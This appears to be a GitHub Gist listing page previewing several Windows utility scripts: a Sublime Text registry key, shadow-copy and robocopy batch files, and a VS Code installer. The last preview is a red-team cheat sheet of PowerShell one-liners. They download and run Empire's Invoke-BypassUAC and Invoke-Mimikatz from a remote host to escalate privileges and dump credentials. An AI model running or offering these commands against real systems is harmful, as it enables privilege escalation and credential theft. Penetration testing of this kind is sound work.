This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
; https://stackoverflow.com/questions/34627893/github-desktop-open-in-sublime-not-atom | |
; https://github.com/desktop/desktop/blob/development/app/src/lib/editors/win32.ts | |
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sublime Text 3_is1] | |
"Publisher"="Sublime HQ Pty Ltd" | |
"DisplayName"="Sublime Text 3" | |
"InstallLocation"="D:\\dev\\subltext\\" | |
"Comment"="This key is needed for Github to detect SublimeText" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
:begins | |
set __SID_LOG=%~dp0list_restore_point | |
del /f "%__SID_LOG%" >nul 2>&1 | |
vssadmin list shadows >>"%__SID_LOG%" | |
if exist "%__SID_LOG%" ( | |
start notepad "%__SID_LOG%" | |
echo ==================================================================== | |
echo. | |
echo Example Usage: Shadow Copy ID={3b7f66e2-d6c5-49fd-9bce-ff667f78dad3} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
@title ROBOCOPY - BACKUP SCRIPTS | |
cd /d "%~dp0" | |
set "OPTIONS=E /J /IM /IT" | |
set "EXCLUDE=JOB:exclude_backup.rcj" | |
:: replace your source path below | |
set "_INTERNAL=D:" | |
:: replace your destination path below | |
set "_EXTERNAL=E:\ResultBackup" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function ProcessingAnimation($scriptBlock) { | |
$cursorTop = [Console]::CursorTop | |
try { | |
[Console]::CursorVisible = $false | |
$counter = 0 | |
$frames = '|', '/', '-', '\' | |
$jobName = Start-Job -ScriptBlock $scriptBlock | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@REM desktopicon,addcontextmenufiles,addcontextmenufolders,associatewithfiles,addtopath | |
@echo off | |
if not exist "%CD%\Code.exe" ( | |
echo Cannot found 'Code.exe' in '%CD%'. | |
echo Note: Place this file in 'Visual Studio Code' directory. | |
pause >nul | |
exit 2 | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.Synopsis | |
Download GitHub Release File. | |
.DESCRIPTION | |
A utilities tool for download GitHub release. | |
.PARAMETER Repository | |
The relative url of the repository (owner/repo). | |
.PARAMETER Pattern | |
Matching the pattern file name. | |
.PARAMETER TagName |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
OlderNewer